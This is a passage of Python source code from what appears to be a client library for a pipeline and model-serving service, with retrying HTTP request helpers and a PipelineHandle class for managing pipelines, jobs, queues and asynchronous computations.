self.set_auto_refresh(old_refresh)
def _raw_request_bytes(
self,
method: str,
path: str,
args: Dict[str, Any],
files: Optional[Dict[str, BytesIO]] = None,
add_prefix: bool = True,
api_version: Optional[int] = None) -> Tuple[BytesIO, str]:
file_resets = {}
can_reset = True
if files is not None:
for (fname, fbuff) in files.items():
if hasattr(fbuff, "seek"):
file_resets[fname] = fbuff.seek(0, io.SEEK_CUR)
else:
can_reset = False
def reset_files() -> bool:
if files is None:
return True
if not can_reset:
return False
for (fname, pos) in file_resets.items():
files[fname].seek(pos, io.SEEK_SET)
return True
retry = 0
max_retry = get_max_retry()
while True:
try:
try:
return self._fallible_raw_request_bytes(
method, path, args, files, add_prefix, api_version)
except HTTPError as e:
if e.response.status_code in (403, 404, 500):
retry = max_retry
raise e
except RequestException:
if retry >= max_retry:
raise
if not reset_files():
raise
time.sleep(get_retry_sleep())
retry += 1
def _raw_request_str(
self,
method: str,
path: str,
args: Dict[str, Any],
add_prefix: bool = True,
api_version: Optional[int] = None) -> TextIO:
retry = 0
max_retry = get_max_retry()
while True:
try:
try:
return self._fallible_raw_request_str(
method, path, args, add_prefix, api_version)
except HTTPError as e:
if e.response.status_code in (403, 404, 500):
retry = max_retry
raise e
except RequestException:
if retry >= max_retry:
raise
time.sleep(get_retry_sleep())
retry += 1
def _raw_request_json(
self,
method: str,
path: str,
args: Dict[str, Any],
add_prefix: bool = True,
files: Optional[Dict[str, IO[bytes]]] = None,
api_version: Optional[int] = None) -> Dict[str, Any]:
file_resets = {}
can_reset = True
if files is not None:
for (fname, fbuff) in files.items():
if hasattr(fbuff, "seek"):
file_resets[fname] = fbuff.seek(0, io.SEEK_CUR)
else:
can_reset = False
def reset_files() -> bool:
if files is None:
return True
if not can_reset:
return False
for (fname, pos) in file_resets.items():
files[fname].seek(pos, io.SEEK_SET)
return True
retry = 0
max_retry = get_max_retry()
while True:
try:
try:
return self._fallible_raw_request_json(
method, path, args, add_prefix, files, api_version)
except HTTPError as e:
if e.response.status_code in (403, 404, 500):
retry = max_retry
raise e
except RequestException:
if retry >= max_retry:
raise
if not reset_files():
raise
time.sleep(get_retry_sleep())
retry += 1
def _fallible_raw_request_bytes(
self,
method: str,
path: str,
args: Dict[str, Any],
files: Optional[Dict[str, BytesIO]],
add_prefix: bool,
api_version: Optional[int]) -> Tuple[BytesIO, str]:
prefix = ""
if add_prefix:
if api_version is None:
api_version = self._api_version
prefix = f"{PREFIX}/v{api_version}"
url = f"{self._url}{prefix}{path}"
headers = {
"authorization": self._token,
}
def check_error(req: Response) -> None:
if req.status_code == 403:
raise AccessDenied(req.text)
req.raise_for_status()
# NOTE: no content type check -- will be handled by interpret_ctype
if method == METHOD_GET:
req = requests.get(url, params=args, headers=headers)
check_error(req)
return BytesIO(req.content), req.headers["content-type"]
if method == METHOD_POST:
req = requests.post(url, json=args, headers=headers)
check_error(req)
return BytesIO(req.content), req.headers["content-type"]
if method == METHOD_FILE:
if files is None:
raise ValueError(f"file method must have files: {files}")
req = requests.post(
url,
data=args,
files={
key: (
getattr(value, "name", key),
value,
"application/octet-stream",
) for (key, value) in files.items()
},
headers=headers)
check_error(req)
return BytesIO(req.content), req.headers["content-type"]
raise ValueError(f"unknown method {method}")
def _fallible_raw_request_str(
self,
method: str,
path: str,
args: Dict[str, Any],
add_prefix: bool,
api_version: Optional[int]) -> TextIO:
prefix = ""
if add_prefix:
if api_version is None:
api_version = self._api_version
prefix = f"{PREFIX}/v{api_version}"
url = f"{self._url}{prefix}{path}"
headers = {
"authorization": self._token,
}
def check_error(req: Response) -> None:
if req.status_code == 403:
raise AccessDenied(req.text)
req.raise_for_status()
if req.headers["content-type"] == "application/problem+json":
raise ServerSideError(json.loads(req.text)["errMessage"])
if method == METHOD_GET:
req = requests.get(url, params=args, headers=headers)
check_error(req)
return StringIO(req.text)
if method == METHOD_POST:
req = requests.post(url, json=args, headers=headers)
check_error(req)
return StringIO(req.text)
raise ValueError(f"unknown method {method}")
def _fallible_raw_request_json(
self,
method: str,
path: str,
args: Dict[str, Any],
add_prefix: bool,
files: Optional[Dict[str, IO[bytes]]],
api_version: Optional[int]) -> Dict[str, Any]:
prefix = ""
if add_prefix:
if api_version is None:
api_version = self._api_version
prefix = f"{PREFIX}/v{api_version}"
url = f"{self._url}{prefix}{path}"
headers = {
"authorization": self._token,
}
if method != METHOD_FILE and files is not None:
raise ValueError(
f"files are only allow for post (got {method}): {files}")
req = None
def check_error(req: Response) -> None:
if req.status_code == 403:
raise AccessDenied(req.text)
req.raise_for_status()
if req.headers["content-type"] == "application/problem+json":
raise ServerSideError(json.loads(req.text)["errMessage"])
try:
if method == METHOD_GET:
req = requests.get(url, params=args, headers=headers)
check_error(req)
return json.loads(req.text)
if method == METHOD_FILE:
if files is None:
raise ValueError(f"file method must have files: {files}")
req = requests.post(
url,
data=args,
files={
key: (
getattr(value, "name", key),
value,
"application/octet-stream",
) for (key, value) in files.items()
},
headers=headers)
check_error(req)
return json.loads(req.text)
if method == METHOD_POST:
req = requests.post(url, json=args, headers=headers)
check_error(req)
return json.loads(req.text)
if method == METHOD_PUT:
req = requests.put(url, json=args, headers=headers)
check_error(req)
return json.loads(req.text)
if method == METHOD_DELETE:
req = requests.delete(url, json=args, headers=headers)
check_error(req)
return json.loads(req.text)
if method == METHOD_LONGPOST:
args["token"] = self._token
try:
res = quick_server.worker_request(url, args)
if "errMessage" in res:
raise ServerSideError(res["errMessage"])
return res
except quick_server.WorkerError as e:
if e.get_status_code() == 403:
raise AccessDenied(e.args) from e
raise e
raise ValueError(f"unknown method {method}")
except json.decoder.JSONDecodeError as e:
if req is None:
raise
raise ValueError(req.text) from e
def request_bytes(
self,
method: str,
path: str,
args: Dict[str, Any],
files: Optional[Dict[str, BytesIO]] = None,
add_prefix: bool = True,
api_version: Optional[int] = None) -> Tuple[BytesIO, str]:
return self._raw_request_bytes(
method, path, args, files, add_prefix, api_version)
def _request_json(
self,
method: str,
path: str,
args: Dict[str, Any],
add_prefix: bool = True,
files: Optional[Dict[str, IO[bytes]]] = None,
api_version: Optional[int] = None) -> Dict[str, Any]:
return self._raw_request_json(
method, path, args, add_prefix, files, api_version)
def get_server_version(self) -> VersionResponse:
return cast(VersionResponse, self._raw_request_json(
METHOD_GET, f"{PREFIX}/v{API_VERSION}/version", {
}, add_prefix=False))
def set_maintenance_mode(
self, is_maintenance: bool) -> MaintenanceResponse:
"""Set the maintenance mode of the server
Args:
is_maintenance (bool): If the server should be in maintenance mode.
Returns:
MaintenanceResponse: MaintenanceResponse object.
"""
return cast(MaintenanceResponse, self._request_json(
METHOD_PUT, "/maintenance", {
"is_maintenance": is_maintenance,
}))
def get_maintenance_mode(self) -> MaintenanceResponse:
return cast(MaintenanceResponse, self._request_json(
METHOD_GET, "/maintenance", {}))
def get_pipelines(self) -> List[str]:
return [
res[0]
for res in self.get_pipeline_times(retrieve_times=False)[1]
]
def get_pipeline_ages(self) -> List[Tuple[str, str, str]]:
cur_time, pipelines = self.get_pipeline_times(retrieve_times=True)
return [
(pipe_id, get_age(cur_time, oldest), get_age(cur_time, latest))
for (pipe_id, oldest, latest) in sorted(pipelines, key=lambda el: (
safe_opt_num(el[1]), safe_opt_num(el[2]), el[0]))
]
def get_pipeline_times(
self,
retrieve_times: bool) -> Tuple[
float, List[Tuple[str, Optional[float], Optional[float]]]]:
obj = {}
if retrieve_times:
obj["retrieve_times"] = "1"
res = cast(PipelineList, self._request_json(
METHOD_GET, "/pipelines", obj))
return res["cur_time"], res["pipelines"]
def get_pipeline(self, pipe_id: str) -> 'PipelineHandle':
res = self._pipeline_cache.get(pipe_id)
if res is not None:
return res
res = PipelineHandle(self, pipe_id)
self._pipeline_cache[pipe_id] = res
return res
def get_node_defs(self) -> Dict[str, NodeDefInfo]:
self._maybe_refresh()
if self._node_defs is not None:
return self._node_defs
res = cast(NodeTypes, self._request_json(
METHOD_GET, "/node_types", {}))["info"]
self._node_defs = res
return res
def create_new_blob(self, blob_type: str) -> str:
return cast(BlobInit, self._request_json(
METHOD_POST, "/blob_init", {
"type": blob_type,
}))["blob"]
def create_new_pipeline(
self,
username: Optional[str] = None,
pipename: Optional[str] = None,
index: Optional[int] = None) -> str:
return cast(PipelineInit, self._request_json(
METHOD_POST, "/pipeline_init", {
"user": username,
"name": pipename,
"index": index,
}))["pipeline"]
def duplicate_pipeline(
self, pipe_id: str, dest_id: Optional[str] = None) -> str:
args = {
"pipeline": pipe_id,
}
if dest_id is not None:
args["dest"] = dest_id
return cast(PipelineDupResponse, self._request_json(
METHOD_POST, "/pipeline_dup", args))["pipeline"]
def set_pipeline(
self,
pipe_id: str,
defs: PipelineDef,
warnings_io: Optional[IO[Any]] = sys.stderr) -> 'PipelineHandle':
pipe_create = cast(PipelineCreate, self._request_json(
METHOD_POST, "/pipeline_create", {
"pipeline": pipe_id,
"defs": defs,
}))
pipe_id = pipe_create["pipeline"]
if warnings_io is not None:
warnings = pipe_create["warnings"]
if len(warnings) > 1:
warnings_io.write(
f"{len(warnings)} warnings while "
f"setting pipeline {pipe_id}:\n")
elif len(warnings) == 1:
warnings_io.write(
f"Warning while setting pipeline {pipe_id}:\n")
for warn in warnings:
warnings_io.write(f"{warn}\n")
if warnings:
warnings_io.flush()
return self.get_pipeline(pipe_id)
def update_settings(
self, pipe_id: str, settings: Dict[str, Any]) -> 'PipelineHandle':
pipe_id = cast(PipelineCreate, self._request_json(
METHOD_POST, "/update_pipeline_settings", {
"pipeline": pipe_id,
"settings": settings,
}))["pipeline"]
return self.get_pipeline(pipe_id)
def get_csvs(self) -> List[str]:
return cast(CSVList, self._request_json(
METHOD_GET, "/csvs", {
}))["csvs"]
def add_csv(self, csv_blob_id: str) -> List[str]:
return cast(CSVList, self._request_json(
METHOD_PUT, "/csvs", {
"blob": csv_blob_id,
}))["csvs"]
def remove_csv(self, csv_blob_id: str) -> List[str]:
return cast(CSVList, self._request_json(
METHOD_DELETE, "/csvs", {
"blob": csv_blob_id,
}))["csvs"]
def get_jobs(self) -> List[str]:
return cast(JobList, self._request_json(
METHOD_GET, "/jobs", {
}))["jobs"]
def remove_job(self, job_id: str) -> List[str]:
return cast(JobList, self._request_json(
METHOD_DELETE, "/job", {
"job": job_id,
}))["jobs"]
def create_job(self) -> JobInfo:
return cast(JobInfo, self._request_json(
METHOD_POST, "/job_init", {}))
def get_job(self, job_id: str) -> JobInfo:
return cast(JobInfo, self._request_json(
METHOD_GET, "/job", {
"job": job_id,
}))
def set_job(self, job: JobInfo) -> JobInfo:
return cast(JobInfo, self._request_json(
METHOD_PUT, "/job", {
"job": job,
}))
def get_allowed_custom_imports(self) -> CustomImportsResponse:
return cast(CustomImportsResponse, self._request_json(
METHOD_GET, "/allowed_custom_imports", {}))
@overload
def check_queue_stats( # pylint: disable=no-self-use
self,
pipeline: Optional[str],
minimal: Literal[True]) -> MinimalQueueStatsResponse:
...
@overload
def check_queue_stats( # pylint: disable=no-self-use
self,
pipeline: Optional[str],
minimal: Literal[False]) -> QueueStatsResponse:
...
@overload
def check_queue_stats( # pylint: disable=no-self-use
self,
pipeline: Optional[str],
minimal: bool) -> Union[
MinimalQueueStatsResponse, QueueStatsResponse]:
...
def check_queue_stats(
self,
pipeline: Optional[str] = None,
minimal: bool = False) -> Union[
MinimalQueueStatsResponse, QueueStatsResponse]:
if minimal:
return cast(MinimalQueueStatsResponse, self._request_json(
METHOD_GET, "/queue_stats", {
"pipeline": pipeline,
"minimal": 1,
}))
return cast(QueueStatsResponse, self._request_json(
METHOD_GET, "/queue_stats", {
"pipeline": pipeline,
"minimal": 0,
}))
def get_instance_status(
self,
pipe_id: Optional[str] = None,
node_id: Optional[str] = None) -> Dict[InstanceStatus, int]:
return cast(Dict[InstanceStatus, int], self._request_json(
METHOD_GET, "/instance_status", {
"pipeline": pipe_id,
"node": node_id,
}))
def get_queue_mode(self) -> str:
return cast(QueueMode, self._request_json(
METHOD_GET, "/queue_mode", {}))["mode"]
def set_queue_mode(self, mode: str) -> str:
return cast(QueueMode, self._request_json(
METHOD_PUT, "/queue_mode", {
"mode": mode,
}))["mode"]
def flush_all_queue_data(self) -> None:
def do_flush() -> bool:
res = cast(FlushAllQueuesResponse, self._request_json(
METHOD_POST, "/flush_all_queues", {}))
return bool(res["success"])
while do_flush(): # we flush until there is nothing to flush anymore
time.sleep(1.0)
def get_cache_stats(self) -> CacheStats:
return cast(CacheStats, self._request_json(
METHOD_GET, "/cache_stats", {}))
def reset_cache(self) -> CacheStats:
return cast(CacheStats, self._request_json(
METHOD_POST, "/cache_reset", {}))
def create_kafka_error_topic(self) -> KafkaTopics:
return cast(KafkaTopics, self._request_json(
METHOD_POST, "/kafka_topics", {
"num_partitions": 1,
}))
def delete_kafka_error_topic(self) -> KafkaTopics:
return cast(KafkaTopics, self._request_json(
METHOD_POST, "/kafka_topics", {
"num_partitions": 0,
}))
def read_kafka_errors(self, offset: str = "current") -> List[str]:
return cast(List[str], self._request_json(
METHOD_GET, "/kafka_msg", {
"offset": offset,
}))
def get_named_secret_keys(self) -> List[str]:
return cast(ListNamedSecretKeys, self._request_json(
METHOD_GET, "/named_secrets", {}))["keys"]
def set_named_secret(self, key: str, value: str) -> bool:
return cast(SetNamedSecret, self._request_json(
METHOD_PUT, "/named_secrets", {
"key": key,
"value": value,
}))["replaced"]
def get_error_logs(self) -> str:
with self._raw_request_str(METHOD_GET, "/error_logs", {}) as fin:
return fin.read()
# *** XYMEClientV3 ***
class PipelineHandle:
def __init__(
        self,
        client: XYMEClientV3,
        pipe_id: str) -> None:
    """Create a handle for pipeline *pipe_id* backed by *client*.

    All metadata fields start out unset and are fetched lazily on
    first access (see _maybe_fetch / _fetch_info).
    """
    self._client = client
    self._pipe_id = pipe_id
    self._name: Optional[str] = None  # None doubles as "not fetched yet"
    self._company: Optional[str] = None
    self._state: Optional[str] = None
    self._is_high_priority: Optional[bool] = None
    self._queue_mng: Optional[str] = None
    self._nodes: Dict[str, NodeHandle] = {}  # node id -> handle
    self._node_lookup: Dict[str, str] = {}  # node name -> node id
    self._settings: Optional[Dict[str, Any]] = None
    self._dynamic_error: Optional[str] = None  # last async error message
    self._ins: Optional[List[str]] = None
    self._outs: Optional[List[Tuple[str, str]]] = None
def refresh(self) -> None:
    """Drop all cached pipeline metadata so the next read re-fetches it.

    Node handles are intentionally kept so NodeHandle identity is
    stable across refreshes.
    """
    for attr in (
            "_name",
            "_company",
            "_state",
            "_is_high_priority",
            "_queue_mng",
            "_ins",
            "_outs"):
        setattr(self, attr, None)
def _maybe_refresh(self) -> None:
    """Refresh cached state when the client has auto-refresh enabled."""
    if not self._client.is_auto_refresh():
        return
    self.refresh()
def _maybe_fetch(self) -> None:
    """Fetch pipeline info from the server if nothing is cached yet."""
    if self._name is not None:
        return
    self._fetch_info()
def get_info(self) -> PipelineInfo:
    """Request the full pipeline info object from the server."""
    query = {
        "pipeline": self._pipe_id,
    }
    response = self._client._request_json(
        METHOD_GET, "/pipeline_info", query)
    return cast(PipelineInfo, response)
def _fetch_info(self) -> None:
    """Fetch pipeline info and populate every cached field.

    Existing NodeHandle objects are passed back in so node identity
    survives a refresh.
    """
    info = self.get_info()
    self._name = info["name"]
    self._company = info["company"]
    self._state = info["state"]
    self._is_high_priority = info["high_priority"]
    self._queue_mng = info["queue_mng"]
    self._settings = info["settings"]
    self._ins = info["ins"]
    self._outs = [(el[0], el[1]) for el in info["outs"]]
    # _nodes is initialized to {} in __init__; the None guard is defensive.
    old_nodes = {} if self._nodes is None else self._nodes
    self._nodes = {
        node["id"]: NodeHandle.from_node_info(
            self._client, self, node, old_nodes.get(node["id"]))
        for node in info["nodes"]
    }
    # Only named nodes participate in name -> id resolution.
    self._node_lookup = {
        node["name"]: node["id"]
        for node in info["nodes"]
        if node["name"] is not None
    }
def get_nodes(self) -> List[str]:
    """Return the ids of all nodes in this pipeline."""
    self._maybe_refresh()
    self._maybe_fetch()
    return [node_id for node_id in self._nodes]
def get_node(self, node_id: str) -> 'NodeHandle':
    """Look up a node handle by node id or node name.

    Names resolve through the lookup table; keys not found there fall
    through unchanged so raw node ids keep working.
    """
    self._maybe_refresh()
    self._maybe_fetch()
    resolved = self._node_lookup.get(node_id, node_id)
    return self._nodes[resolved]
def get_id(self) -> str:
    """Return this pipeline's id."""
    return self._pipe_id
def get_name(self) -> str:
    """Return the pipeline name (fetching metadata if needed)."""
    self._maybe_refresh()
    self._maybe_fetch()
    assert self._name is not None
    return self._name
def get_company(self) -> str:
    """Return the owning company (fetching metadata if needed)."""
    self._maybe_refresh()
    self._maybe_fetch()
    assert self._company is not None
    return self._company
def get_state_type(self) -> str:
    """Return the pipeline state type (fetching metadata if needed)."""
    self._maybe_refresh()
    self._maybe_fetch()
    assert self._state is not None
    return self._state
def get_settings(self) -> Dict[str, Any]:
    """Return the pipeline settings (fetching metadata if needed)."""
    self._maybe_refresh()
    self._maybe_fetch()
    assert self._settings is not None
    return self._settings
def get_timing(
        self,
        blacklist: Optional[List[str]] = None,
        ) -> Optional[TimingResult]:
    """Aggregate per-node timing information for the whole pipeline.

    Args:
        blacklist: Timing entry names to exclude from the totals.

    Returns:
        A dict with the pipeline total and per-node timings sorted by
        node total, descending. (The Optional return type notwithstanding,
        this implementation always returns a dict.)
    """
    blist = [] if blacklist is None else blacklist
    node_timing: Dict[str, NodeTiming] = {}
    nodes = self.get_nodes()

    def get_filterd_times(
            node_time: List[Timing]) -> Tuple[float, float, List[Timing]]:
        # Returns (total, average, kept entries) after blacklist filtering.
        fns = []
        node_total = 0.0
        for value in node_time:
            if value["name"] not in blist:
                fns.append(value)
                node_total += value["total"]
        if not fns:
            return (0, 0, fns)
        return (node_total, node_total / len(fns), fns)

    pipe_total = 0.0
    for node in nodes:
        node_get = self.get_node(node)
        node_time = node_get.get_timing()
        node_name = node_get.get_node_def()["name"]
        node_id = node_get.get_id()
        node_total, avg_time, fns = get_filterd_times(node_time)
        node_timing[node_id] = {
            "node_name": node_name,
            "node_total": node_total,
            "node_avg": avg_time,
            "fns": fns,
        }
        pipe_total += node_total
    node_timing_sorted = sorted(
        node_timing.items(),
        key=lambda x: x[1]["node_total"],
        reverse=True)
    return {
        "pipe_total": pipe_total,
        "nodes": node_timing_sorted,
    }
def is_high_priority(self) -> bool:
    """Return whether the pipeline is marked high priority."""
    self._maybe_refresh()
    self._maybe_fetch()
    assert self._is_high_priority is not None
    return self._is_high_priority
def is_queue(self) -> bool:
    """Return whether the pipeline has a queue manager configured."""
    self._maybe_refresh()
    self._maybe_fetch()
    return self._queue_mng is not None
def get_queue_mng(self) -> Optional[str]:
    """Return the queue manager name, or None if there is none."""
    self._maybe_refresh()
    self._maybe_fetch()
    return self._queue_mng
def get_ins(self) -> List[str]:
    """Return the pipeline's input names."""
    self._maybe_refresh()
    self._maybe_fetch()
    assert self._ins is not None
    return self._ins
def get_outs(self) -> List[Tuple[str, str]]:
    """Return the pipeline's outputs as (node, key) pairs."""
    self._maybe_refresh()
    self._maybe_fetch()
    assert self._outs is not None
    return self._outs
@contextlib.contextmanager
def bulk_operation(self) -> Iterator[bool]:
    """Suspend client auto-refresh for the duration of the context.

    Performs one explicit refresh on entry when auto-refresh was
    previously active; yields that previous setting.
    """
    with self._client.bulk_operation() as do_refresh:
        if do_refresh:
            self.refresh()
        yield do_refresh
def set_pipeline(self, defs: PipelineDef) -> None:
    """Replace this pipeline's definition on the server."""
    self._client.set_pipeline(self.get_id(), defs)
def update_settings(self, settings: Dict[str, Any]) -> None:
    """Update this pipeline's settings on the server."""
    self._client.update_settings(self.get_id(), settings)
def dynamic_model(
        self,
        inputs: List[Any],
        format_method: str = "simple",
        no_cache: bool = False) -> List[Any]:
    """Run the pipeline's model on *inputs* and return the result list."""
    payload = {
        "format": format_method,
        "inputs": inputs,
        "no_cache": no_cache,
        "pipeline": self._pipe_id,
    }
    response = cast(DynamicResults, self._client._request_json(
        METHOD_POST, "/dynamic_model", payload))
    return response["results"]
def dynamic_list(
        self,
        inputs: List[Any],
        input_key: Optional[str] = None,
        output_key: Optional[str] = None,
        split_th: Optional[int] = 1000,
        max_threads: int = 50,
        format_method: str = "simple",
        force_keys: bool = False,
        no_cache: bool = False) -> List[Any]:
    """Run the pipeline on a list of inputs, splitting large batches.

    Inputs no longer than *split_th* (or any size when split_th is None)
    are sent as a single request. Larger lists are recursively halved
    and processed on up to *max_threads* helper threads; results are
    written back into their original positions.

    Raises:
        ValueError: When a request error occurs during batched
            processing (suggesting split_th is too large).
    """
    if split_th is None or len(inputs) <= split_th:
        res = cast(DynamicResults, self._client._request_json(
            METHOD_POST, "/dynamic_list", {
                "force_keys": force_keys,
                "format": format_method,
                "input_key": input_key,
                "inputs": inputs,
                "no_cache": no_cache,
                "output_key": output_key,
                "pipeline": self._pipe_id,
            }))
        return res["results"]
    split_num: int = split_th
    assert split_num > 0
    res_arr: List[Any] = [None] * len(inputs)
    # Single-element list so worker threads can report the first error.
    exc: List[Optional[BaseException]] = [None]
    active_ths: Set[threading.Thread] = set()

    def compute_half(cur: List[Any], offset: int) -> None:
        # Stop early once any worker has failed.
        if exc[0] is not None:
            return
        if len(cur) <= split_num:
            try:
                cur_res = self.dynamic_list(
                    cur,
                    input_key=input_key,
                    output_key=output_key,
                    split_th=None,
                    max_threads=max_threads,
                    format_method=format_method,
                    force_keys=force_keys,
                    no_cache=no_cache)
                res_arr[offset:offset + len(cur_res)] = cur_res
            except BaseException as e:  # pylint: disable=broad-except
                exc[0] = e
            return
        half_ix: int = len(cur) // 2
        args_first = (cur[:half_ix], offset)
        args_second = (cur[half_ix:], offset + half_ix)
        if len(active_ths) < max_threads:
            # Process the first half on a new thread, the second inline.
            comp_th = threading.Thread(
                target=compute_half, args=args_first)
            active_ths.add(comp_th)
            comp_th.start()
            compute_half(*args_second)
            comp_th.join()
            active_ths.remove(comp_th)
        else:
            compute_half(*args_first)
            compute_half(*args_second)

    compute_half(inputs, 0)
    for remain_th in active_ths:
        remain_th.join()
    raise_e = exc[0]
    try:
        if isinstance(raise_e, BaseException):
            raise raise_e  # pylint: disable=raising-bad-type
    except RequestException as e:
        raise ValueError(
            "request error while processing. processing time per batch "
            "might be too large. try reducing split_th") from e
    return res_arr
def dynamic(self, input_data: BytesIO) -> ByteResponse:
    """Send raw input bytes through the pipeline and parse the response."""
    upload = {
        "file": input_data,
    }
    content, ctype = self._client.request_bytes(
        METHOD_FILE, "/dynamic", {
            "pipeline": self._pipe_id,
        }, files=upload)
    return interpret_ctype(content, ctype)
def dynamic_obj(self, input_obj: Any) -> ByteResponse:
    """Serialize *input_obj* as compact, sorted JSON and run dynamic()."""
    text = json.dumps(
        input_obj,
        separators=(",", ":"),
        indent=None,
        sort_keys=True)
    return self.dynamic(BytesIO(text.encode("utf-8")))
def dynamic_async(
        self, input_data: List[BytesIO]) -> List['ComputationHandle']:
    """Queue one asynchronous computation per input buffer.

    Returns computation handles in the same order as *input_data*.
    """
    names = [f"file{pos}" for pos in range(len(input_data))]
    res: Dict[str, str] = self._client._request_json(
        METHOD_FILE, "/dynamic_async", {
            "pipeline": self._pipe_id,
        }, files=dict(zip(names, input_data)))
    handles: List['ComputationHandle'] = []
    for name in names:
        handles.append(ComputationHandle(
            self,
            res[name],
            self.get_dynamic_error_message,
            self.set_dynamic_error_message))
    return handles
def set_dynamic_error_message(self, msg: Optional[str]) -> None:
    """Record (or clear, with None) the last async computation error."""
    self._dynamic_error = msg
def get_dynamic_error_message(self) -> Optional[str]:
    """Return the last recorded async computation error, if any."""
    return self._dynamic_error
def dynamic_async_obj(
        self, input_data: List[Any]) -> List['ComputationHandle']:
    """JSON-serialize each object and queue it via dynamic_async()."""
    buffers: List[BytesIO] = []
    for input_obj in input_data:
        text = json.dumps(
            input_obj,
            separators=(",", ":"),
            indent=None,
            sort_keys=True)
        buffers.append(BytesIO(text.encode("utf-8")))
    return self.dynamic_async(buffers)
def get_dynamic_result(self, data_id: str) -> ByteResponse:
    """Fetch the result of a previously queued computation.

    Raises:
        KeyError: If the server does not know *data_id* (HTTP 404).
    """
    try:
        content, ctype = self._client.request_bytes(
            METHOD_GET, "/dynamic_result", {
                "pipeline": self._pipe_id,
                "id": data_id,
            })
    except HTTPError as e:
        if e.response.status_code == 404:
            raise KeyError(f"data_id {data_id} does not exist") from e
        raise e
    return interpret_ctype(content, ctype)
def get_dynamic_status(
        self,
        data_ids: List['ComputationHandle'],
        ) -> Dict['ComputationHandle', QueueStatus]:
    """Query queue status for a batch of computation handles."""
    res = cast(DynamicStatusResponse, self._client._request_json(
        METHOD_POST, "/dynamic_status", {
            "data_ids": [data_id.get_id() for data_id in data_ids],
            "pipeline": self._pipe_id,
        }))
    # Map raw ids back to the handle objects the caller passed in.
    hnd_map = {data_id.get_id(): data_id for data_id in data_ids}
    out: Dict['ComputationHandle', QueueStatus] = {}
    for key, value in res["status"].items():
        out[hnd_map[key]] = cast(QueueStatus, value)
    return out
def get_dynamic_bulk(
        self,
        input_data: List[BytesIO],
        max_buff: int = 4000,
        block_size: int = 5,
        num_threads: int = 20) -> Iterable[ByteResponse]:
    """Stream results for many inputs via the async compute machinery.

    Generator: yields one ByteResponse per input as results become
    available. On full success the stored dynamic error message is
    cleared; if the consumer aborts or an error occurs it is kept.
    """
    def get(hnd: 'ComputationHandle') -> ByteResponse:
        return hnd.get()
    success = False
    try:
        # NOTE(review): check_queue_stats is not defined in the visible
        # part of PipelineHandle — presumably declared later in the file.
        yield from async_compute(
            input_data,
            self.dynamic_async,
            get,
            lambda: self.check_queue_stats(minimal=True),
            self.get_dynamic_status,
            max_buff,
            block_size,
            num_threads)
        success = True
    finally:
        if success:
            self.set_dynamic_error_message(None)
def get_dynamic_bulk_obj(
        self,
        input_data: List[Any],
        max_buff: int = 4000,
        block_size: int = 5,
        num_threads: int = 20) -> Iterable[ByteResponse]:
    """Like get_dynamic_bulk but for JSON-serializable objects.

    Generator: yields one ByteResponse per input object; clears the
    stored dynamic error message only on full success.
    """
    def get(hnd: 'ComputationHandle') -> ByteResponse:
        return hnd.get()
    success = False
    try:
        yield from async_compute(
            input_data,
            self.dynamic_async_obj,
            get,
            lambda: self.check_queue_stats(minimal=True),
            self.get_dynamic_status,
            max_buff,
            block_size,
            num_threads)
        success = True
    finally:
        if success:
            self.set_dynamic_error_message(None)
def pretty(
        self, nodes_only: bool = False, allow_unicode: bool = True) -> str:
    """Render the pipeline DAG as box-drawing ASCII/Unicode art.

    Args:
        nodes_only: When True, draw compact status-only node boxes.
        allow_unicode: Use Unicode box-drawing glyphs; fall back to
            plain ASCII otherwise.

    Returns:
        The multi-line drawing as a single string.
    """
    nodes = [
        self.get_node(node_id)
        for node_id in sorted(self.get_nodes())
    ]
    already: Set[NodeHandle] = set()
    order: List[NodeHandle] = []  # topological order of nodes
    # Maps a producer node to its consumers as (node, in_key, out_key).
    outs: Dict[
        NodeHandle,
        List[Tuple[NodeHandle, str, str]],
    ] = collections.defaultdict(list)
    # Glyph palette; every glyph degrades to ASCII when requested.
    start_pipe = "├" if allow_unicode else "|"
    end_pipe = "├" if allow_unicode else "|"
    before_pipe = "│" if allow_unicode else "|"
    after_pipe = "│" if allow_unicode else "|"
    pipe = "┤" if allow_unicode else "|"
    corner_right = "┐" if allow_unicode else "\\"
    corner_left = "┘" if allow_unicode else "/"
    cont_right = "┬" if allow_unicode else "\\"
    cont_left = "┴" if allow_unicode else "/"
    cont_skip = "─" if allow_unicode else "-"
    cont_pipe = "│" if allow_unicode else "|"
    cont = "┼" if allow_unicode else "-"
    start_left = "└" if allow_unicode else "\\"
    bar = "─" if allow_unicode else "-"
    vsec = "│" if allow_unicode else "|"
    vstart = "├" if allow_unicode else "|"
    vend = "┤" if allow_unicode else "|"
    hsec = "─" if allow_unicode else "-"
    tl = "┌" if allow_unicode else "+"
    tr = "┐" if allow_unicode else "+"
    bl = "└" if allow_unicode else "+"
    br = "┘" if allow_unicode else "+"
    conn_top = "┴" if allow_unicode else "-"
    conn_bottom = "┬" if allow_unicode else "-"
    space = " "
    prefix_len = 2 if nodes_only else 3
    indent = space * prefix_len

    def topo(cur: NodeHandle) -> None:
        # Depth-first topological sort; also records consumer edges.
        if cur in already:
            return
        for in_key in sorted(cur.get_inputs()):
            out_node, out_key = cur.get_input(in_key)
            outs[out_node].append((cur, in_key, out_key))
            topo(out_node)
        already.add(cur)
        order.append(cur)

    for tnode in nodes:
        topo(tnode)
    in_states: Dict[NodeHandle, Dict[str, int]] = {}
    order_lookup = {
        node: pos for (pos, node) in enumerate(order)
    }

    def get_in_state(node: NodeHandle, key: str) -> int:
        # Lazily cache each node's input cursor states; default 0.
        if node not in in_states:
            in_states[node] = node.get_in_cursor_states()
        return in_states[node].get(key, 0)

    def draw_in_edges(
            node: NodeHandle,
            cur_edges: List[Tuple[Optional[NodeHandle], str, int]],
            ) -> Tuple[List[Tuple[Optional[NodeHandle], str, int]], str]:
        # Emit labels for edges terminating at *node*; an edge's node is
        # set to None once consumed, and trailing Nones are dropped.
        gap = 0
        prev_gap = 0
        new_edges: List[Tuple[Optional[NodeHandle], str, int]] = []
        segs: List[str] = []
        for edge in cur_edges:
            in_node, in_key, cur_gap = edge
            before_gap = cur_gap
            if in_node == node:
                in_state = get_in_state(in_node, in_key)
                cur_str = f"{end_pipe} {in_key} ({in_state}) "
                new_edges.append((None, in_key, cur_gap))
            else:
                cur_str = before_pipe if in_node is not None else ""
                cur_gap += gap
                gap = 0
                new_edges.append((in_node, in_key, cur_gap))
            segs.append(f"{space * prev_gap}{cur_str}")
            prev_gap = max(0, before_gap - len(cur_str))
        while new_edges:
            if new_edges[-1][0] is None:
                new_edges.pop()
            else:
                break
        return new_edges, "".join(segs)

    def draw_out_edges(
